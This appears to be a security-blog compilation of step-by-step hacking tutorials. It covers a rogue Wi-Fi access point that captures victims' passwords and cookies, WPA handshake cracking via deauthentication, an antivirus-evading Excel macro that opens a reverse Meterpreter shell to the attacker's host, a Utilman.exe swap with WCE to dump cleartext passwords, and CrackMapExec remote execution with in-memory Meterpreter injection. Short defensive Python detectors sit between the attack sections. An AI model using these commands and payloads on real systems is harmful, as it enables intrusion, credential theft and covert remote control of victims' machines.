Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin)

WiFi-Pumpkin is a framework for the rogue Wi-Fi access point attack. It helps a hacker create a free, open, fake Wi-Fi network, and as soon as a victim connects to it, he gets trapped. The best feature is that if your own internet connection is working, the victim still gets internet access, so there is an even greater chance of him staying trapped (nice, isn't it?).

First, to install WiFi-Pumpkin, we clone it by typing in a terminal:




Once the cloning is done, we need to install it. Go to the cloned WiFi-Pumpkin directory, open it in a terminal and type the following command:
./installer.sh --install


Now, open the WiFi-Pumpkin directory in a terminal and type:
python wifi-pumpkin.py
This loads the WiFi-Pumpkin GUI, as you can see in the screenshot below.


Now, all you have to do is configure your settings and click on ‘Start Access Point’.
Wait for some devices to connect. They will be displayed as you can see below. A good thing is that devices are automatically assigned a class A IP address.


On the victim's phone a network called PumpAP appears, and he/she starts accessing the internet through it without even knowing they have fallen into the sweet trap of free internet!


While the victim is accessing Wi-Fi as usual, we can see his/her activity. As you can see in the screenshot below, we are able to capture the victim's phone's "Hike Contacts".
As soon as the victim opens anyone's profile on Hike, their number is captured by us!


Other notable features include cookie capturing. As in the screenshot below, we can see the victim's device's cookies, which is useful because they may contain something interesting.

We are also able to capture credentials (login ID and password) submitted to any HTTP website.

As you can see below, the victim has logged in to way2sms.com and their ID and password have been recorded.


In an even better scenario, many victims will connect to your fake wireless network thinking they are in luck, and we will be recording everything in clear text. If we cannot see everything in the terminal, don't worry: WiFi-Pumpkin stores everything, sorted by category.
Now, we go to the directory:

/WiFi-Pumpkin/logs/AccessPoint


In that directory there are many log files holding the captured items. One such text file is "credentials.log".
Here we can see all the login details.


Another notable file is "urls.log".
Here we can see all the URLs accessed from the victim's device, along with their IP address.


So, this is how you allure victims into free internet and steal data without even letting them know!
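From the defender's side, the PumpAP network above is simply an open access point that nobody authorised. The following added example (not part of WiFi-Pumpkin) checks a Wi-Fi scan against an allow-list of known BSSIDs per SSID and flags evil twins, lookalike SSIDs and unlisted open networks; all SSIDs, BSSIDs and the allow-list are constructed values.

```python
"""Rogue access point check over a Wi-Fi scan (added example, not WiFi-Pumpkin code).
A defender keeps an allow-list of authorised BSSIDs per SSID and alerts on any
entry that does not fit: an unknown BSSID on a known SSID, a lookalike SSID,
or an open network that is not on the list at all."""
from dataclasses import dataclass

@dataclass(frozen=True)
class ScanEntry:
    ssid: str
    bssid: str
    security: str  # "OPEN", "WPA2", ...

# Constructed allow-list: SSID -> authorised BSSIDs (hypothetical values)
KNOWN_APS = {
    "CorpWiFi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
    "CorpGuest": {"aa:bb:cc:00:00:03"},
}

def normalise_ssid(ssid):
    """Fold case and drop punctuation so 'Corp-WiFi' matches 'CorpWiFi'."""
    return "".join(ch for ch in ssid.lower() if ch.isalnum())

def find_rogue_aps(scan, known=KNOWN_APS):
    """Return (bssid, ssid, reason) for every suspicious entry in the scan."""
    lookalikes = {normalise_ssid(s): s for s in known}
    alerts = []
    for e in scan:
        bssid = e.bssid.lower()
        if e.ssid in known:
            if bssid not in known[e.ssid]:
                alerts.append((bssid, e.ssid, "evil twin: unknown BSSID for known SSID"))
            continue
        target = lookalikes.get(normalise_ssid(e.ssid))
        if target:
            alerts.append((bssid, e.ssid, f"lookalike of {target}"))
        elif e.security == "OPEN":
            alerts.append((bssid, e.ssid, "open network not in allow-list"))
    return alerts

# Constructed scan result for the demo
SAMPLE_SCAN = [
    ScanEntry("CorpWiFi", "AA:BB:CC:00:00:01", "WPA2"),      # legitimate
    ScanEntry("CorpWiFi", "DE:AD:BE:EF:00:01", "OPEN"),      # evil twin
    ScanEntry("Corp-WiFi", "DE:AD:BE:EF:00:02", "WPA2"),     # lookalike SSID
    ScanEntry("PumpAP", "DE:AD:BE:EF:00:03", "OPEN"),        # open rogue AP
    ScanEntry("NeighbourNet", "11:22:33:44:55:66", "WPA2"),  # unrelated, ignored
]

if __name__ == "__main__":
    for bssid, ssid, reason in find_rogue_aps(SAMPLE_SCAN):
        print(f"{bssid}  {ssid!r:14} {reason}")
```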

Wifi Penetration Testing using Gerix Wifi Cracker

Gerix Wifi Cracker is a GUI wireless 802.11 penetration testing tool that uses aircrack-ng behind its point-and-click interface to crack Wi-Fi passwords.
First of all, clone the GitHub repo with the command:
Now, inside the cloned directory, give the gerix.py file permission to execute with the command:
chmod +x gerix.py
and then start the gerix wifi cracker with command:

python gerix.py


Now a GUI window will appear. Click on "Reload the Wireless Interfaces", and when the wireless interface appears, click on it (wlan0 in my case). Then click on "Enable/Disable Monitor Mode" to switch the interface from managed mode to monitor mode.


After enabling monitor mode, the wireless interface name changes to wlan0mon and its mode shows as monitor. Now, to scan for wireless networks, select the monitor mode interface (wlan0mon in my case) and click on "Rescan networks".


After scanning, select your target by clicking on it (in my case I selected the TP-Link network) and then go to the WPA tab (as the target AP is using WPA2 security).


In the WPA tab, go to "General functionalities" and click on "Start sniffing and logging". A terminal window will appear, capturing the packets of the target AP.


Now, without closing that terminal window, go to the "WPA attack" section and click on "Autoload victim clients", which loads the MAC address of a connected client to deauthenticate. Then click on "Client Deauthentication" to disconnect the client, so that we can capture the handshake when it reconnects.


As you can see, the WPA handshake is successfully captured; this is also shown in the top right corner of the terminal window. Now close the terminal window.


Now we have to crack the password from the captured file, so go to the "Cracking" tab and then to the "WPA bruteforce cracking" section, give the dictionary path in the "Add your dictionary" field and click on "Aircrack-ng - Crack WPA password" (you can also choose another cracking method, such as Pyrit or rainbow tables).


As you can see it has successfully cracked the password.
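The client deauthentication step above works by sending a burst of deauth frames with the AP's own address as source, which is the observable a wireless IDS keys on. The following added example (not part of Gerix) runs a sliding-window deauth-burst detector over a constructed list of 802.11 management frames; the BSSID and timestamps are made up.

```python
"""Deauthentication-burst detection over captured 802.11 management frames
(added example, not Gerix code). Because the frames spoof the AP's address,
the alert names the BSSID being impersonated, not the attacker's hardware."""
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0x0C, 0x0A  # 802.11 management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_floods(frames, threshold=10, window=2.0):
    """frames: iterable of (ts_seconds, subtype, src_mac, dst_mac), sorted by ts.
    Returns one (src_mac, burst_start_ts, count) alert per source address."""
    recent = defaultdict(deque)   # src_mac -> timestamps inside the window
    alerts, alerted = [], set()
    for ts, subtype, src, dst in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:     # slide the window forward
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, q[0], len(q)))
    return alerts

# Constructed capture: one normal deauth, then a burst of 64 broadcast deauths
AP = "aa:bb:cc:00:00:01"   # hypothetical BSSID of the legitimate AP
SAMPLE_FRAMES = [(0.0, DEAUTH, AP, "11:22:33:44:55:66")]
SAMPLE_FRAMES += [(5.0 + i * 0.01, DEAUTH, AP, BROADCAST) for i in range(64)]
SAMPLE_FRAMES += [(6.0, 0x08, AP, BROADCAST)]            # beacon, ignored

if __name__ == "__main__":
    for src, start, count in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood: {count} frames from {src} starting at t={start:.2f}s")
```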

Hack Remote PC using Microsoft Office Files (Macro Payloads)

Veil-Evasion is a powerful tool to generate payload executables that bypass common antivirus solutions.

To install veil-evasion on your kali linux, type :
>apt-get install veil-evasion

After the installation completes, run veil-evasion with the following command on terminal, in the installed directory of veil-evasion:

>veil-evasion


To list the available payloads, type:
> list
We can see a menu of the available payloads; there are plenty to choose from.


We will be using the payload id-23. We type the command:
>use powershell/meterpreter/rev_https

Reverse HTTPS is used here in case the victim's PC has a firewall filtering plain TCP connections; in the most common situations, HTTPS is not blocked.

After that set local host(Your PC's IP). In my case it is 192.168.0.105. Hence:

>set lhost  192.168.0.105

And then generate the payload:

>generate


Enter the name of the file. Let the file to be generated be named raj, therefore:
>raj


Now the Veil-Evasion tool has created a .bat file containing PowerShell code in the directory:
/var/lib/veil-evasion/output/source/raj.bat


Open a new terminal window and install MacroShop. MacroShop is a collection of scripts, mostly in Python, that help deliver payloads via Office macros. To install it we type:
>git clone https://github.com/khr0x40sh/MacroShop.git


After the installation of MacroShop, open its installed folder and place the file "raj.bat" in that directory.


Once the file "raj.bat" is placed in MacroShop, change the terminal path to the MacroShop directory (or right-click the directory and choose "Open in terminal") and type:
>python macro_safe.py raj.bat file.txt
Here file.txt is the name of the output text file that MacroShop will create.


Now, on Windows, create a new Microsoft Office Excel worksheet, open the View tab on the top bar and click Macros.
Enter a macro name and click Create.


Then in the Macro editing area(or the workbook) copy paste the code present in "file.txt" to the workbook and save macro.


Now edit the Excel worksheet to make it look authentic, and in such a way that the victim will definitely enable the macro option (given that it is disabled by default).

Just for simplicity in this tutorial, I enter something random and save it as a Microsoft Excel 97-2003 document.



Open the Excel document again and enable the macro option (if disabled).


Meanwhile, open Metasploit on Kali Linux:
msf>use exploit/multi/handler
msf exploit(handler)>set payload windows/meterpreter/reverse_https
msf exploit(handler)>set lhost 192.168.0.105
msf exploit(handler)>set lport 8443
msf exploit(handler)>exploit

As soon as the victim enables the macro and/or opens the Excel document, voila! We get the Meterpreter session. Hence, the job is done.
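The macro above ends with Excel starting cmd.exe, which in turn runs PowerShell, and that parent-child chain is what endpoint telemetry catches. The following added example (not Veil or MacroShop code) walks the ancestry of every shell in a batch of constructed process-creation records, in the shape of Sysmon event 1, and alerts when an Office application is among its ancestors; all pids, paths and command lines are made up.

```python
"""Detect shells spawned from Office processes (added example; not Veil/MacroShop code).
Process-creation telemetry records each process with its parent, so walking the
ancestry of every shell catches Excel -> cmd.exe -> powershell.exe chains."""
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def office_spawned_shells(events, max_depth=3):
    """events: process-creation records {pid, ppid, image, cmdline}.
    Returns an alert for each shell whose ancestry (up to max_depth parents)
    includes an Office app. Caveat: pid-keyed lookups assume no pid reuse inside
    the batch; real pipelines key on a process GUID instead."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        chain = [basename(e["image"])]
        parent = by_pid.get(e["ppid"])
        while parent and len(chain) <= max_depth:
            chain.append(basename(parent["image"]))
            if chain[-1] in OFFICE_APPS:
                alerts.append({"pid": e["pid"], "chain": " <- ".join(chain),
                               "cmdline": e["cmdline"]})
                break
            parent = by_pid.get(parent["ppid"])
    return alerts

# Constructed telemetry: explorer -> Excel -> cmd -> powershell, plus a benign cmd
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": '"EXCEL.EXE" invoice.xls'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c %TEMP%\dropped.bat"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe <arguments redacted>"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
]

if __name__ == "__main__":
    for a in office_spawned_shells(SAMPLE_EVENTS):
        print(f"pid {a['pid']}: {a['chain']}  |  {a['cmdline']}")
```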


Hack Locked Workstation Password in Clear Text

For this tutorial we will be using the Kali Linux ISO, which can be found on the official website, and WCE (Windows Credentials Editor), which can be found at


Download the universal version if you don’t know the target system architecture (32 bit or 64 bit).

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).


First of all, make your pen drive bootable with Kali Linux (you can choose any other Linux distro) and copy wce.exe to the pen drive. Then boot the target system from the pen drive, choose the "Live boot" option from the boot menu and hit Enter.


After the OS boots up, go to File Manager, browse to "Other Locations" and choose the 16 GB volume (the size of the Windows installation, which will be different in your case).


Now browse to the Windows/System32 folder.


Now rename the Utilman.exe file to any other name, and then rename cmd.exe to Utilman.exe.


Now restart the system, but this time don't boot into Kali Linux; let it boot into the installed Windows, and you will be presented with the password screen after choosing the user.


At the password screen, a blue "Ease of Access" icon is present at the lower left. Click on it and a command window will open.


Now you have to execute the wce.exe file on the pen drive, so first find the drive letter of the connected devices by typing:
diskpart  (a Windows command line utility for managing disks and partitions)
and then, at the diskpart prompt, type:
list volume  (shows all the connected drives)
Now pick the drive with the FAT32 filesystem (to be sure, also confirm the drive by comparing its size with that of your pen drive).
In my case it is F. Now exit diskpart by pressing Ctrl+C.


Now switch to the pen drive by typing the following command: f:  (here f is the drive letter; in your case it could be different) and then execute the wce.exe file you copied previously with the command:
wce.exe -w  (-w is used to dump all the passwords in clear text)
As you can see, it has successfully dumped the password in clear text.

Penetration Testing in Windows/Active Directory with Crackmapexec

Crackmapexec is a swiss army knife for pentesting Windows/Active Directory environments. Active Directory (AD) is a directory service that Microsoft developed for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services.

First of all, to install crackmapexec run the following commands:
apt-get install -y libssl-dev libffi-dev python-dev build-essential

I have already installed all the requirements, which is why it shows them as already installed, but you will have to install them.
Now we will create a virtual environment for crackmapexec with virtualenvwrapper.
virtualenvwrapper is a set of extensions to the virtualenv tool. The extensions include wrappers for creating and deleting virtual environments and otherwise managing your development workflow, making it easier to work on more than one project at a time without introducing conflicts in their dependencies.
apt-get install virtualenvwrapper
source /usr/share/virtualenvwrapper/virtualenvwrapper.sh
mkvirtualenv CME
pip install git+https://github.com/CoreSecurity/impacket

pip install crackmapexec


Now to execute a windows command remotely run the following command:

crackmapexec 192.168.0.104 -u administrator -p 'Igni*******' -x whoami

As you can see, the server is pwned and the output of the command is rajlab\administrator.
Here 192.168.0.104 is the IP of the server running the Active Directory service on the network.
We can also execute a PowerShell command:



crackmapexec 192.168.0.104 -u administrator -p 'Igni*******' -X '$PSVersionTable'

The command is executed successfully and the output shows the PowerShell version.
If we don't know which host is the Active Directory server, we can run crackmapexec against the whole network by giving the network range, in my case 192.168.0.0/24.



Now it is time to get a Meterpreter shell, so start Metasploit with the command msfconsole in a new terminal and set up the reverse handler:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.132
set lport 444
exploit



Now on the previous terminal run command:
crackmapexec 192.168.0.104 -u administrator -p Ign******* -M metinject -o LHOST=192.168.0.132 LPORT=444
As you can see, the payload is executed successfully: the metinject module runs the PowerShell script Invoke-Shellcode.ps1 to inject Meterpreter directly into memory and get the reverse Meterpreter shell.
Here -M selects the module to use.


As you can see we got the meterpreter shell.
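Running crackmapexec against a whole range, as described above, authenticates one account to many hosts within seconds, and each success lands in the Windows security log as event 4624 with logon type 3 (network). The following added example (not part of CrackMapExec) parses a constructed CSV export of such events and alerts when one (account, source IP) pair reaches a threshold of distinct target hosts inside a sliding window; the timestamps, hostnames and the second account are made up, and the account and source IP reuse the page's own lab values.

```python
"""Fan-out detection for network logons (added example, not part of CrackMapExec).
Counts distinct target hosts per (account, source IP) in a sliding window over
4624 / logon type 3 events; the log lines below are constructed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed CSV export: timestamp,event_id,logon_type,account,source_ip,target_host
SAMPLE_LOG = "\n".join(
    [f"2024-05-01T10:00:{i*2:02d},4624,3,RAJLAB\\administrator,192.168.0.132,WS{i:02d}" for i in range(8)]
    + [f"2024-05-01T10:00:{i*3:02d},4624,3,RAJLAB\\alice,192.168.0.50,FS01" for i in range(8)]
)

def parse_log(text):
    rows = []
    for line in text.splitlines():
        ts, event_id, logon_type, account, src_ip, host = line.split(",")
        rows.append({"ts": datetime.fromisoformat(ts), "event_id": int(event_id),
                     "logon_type": int(logon_type), "account": account.lower(),
                     "src_ip": src_ip, "host": host})
    return sorted(rows, key=lambda r: r["ts"])

def detect_logon_fanout(events, min_hosts=5, window=timedelta(minutes=5)):
    """One alert per (account, src_ip) that reaches min_hosts distinct targets within window."""
    recent = defaultdict(deque)   # (account, src_ip) -> (ts, host) inside the window
    alerts, fired = [], set()
    for e in events:
        if e["event_id"] != 4624 or e["logon_type"] != 3:
            continue
        key = (e["account"], e["src_ip"])
        q = recent[key]
        q.append((e["ts"], e["host"]))
        while q and e["ts"] - q[0][0] > window:
            q.popleft()
        hosts = sorted({h for _, h in q})
        if len(hosts) >= min_hosts and key not in fired:
            fired.add(key)
            alerts.append({"account": key[0], "src_ip": key[1], "hosts": hosts,
                           "first": q[0][0], "last": e["ts"]})
    return alerts

if __name__ == "__main__":
    for a in detect_logon_fanout(parse_log(SAMPLE_LOG)):
        print(f"{a['account']} from {a['src_ip']} reached {len(a['hosts'])} hosts "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}")
```

The benign account logging on to the same file server repeatedly never trips the rule, because it counts distinct hosts rather than raw logon volume.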


Author: Himanshu Gupta is an InfoSec researcher and technical writer. You can follow him on LinkedIn.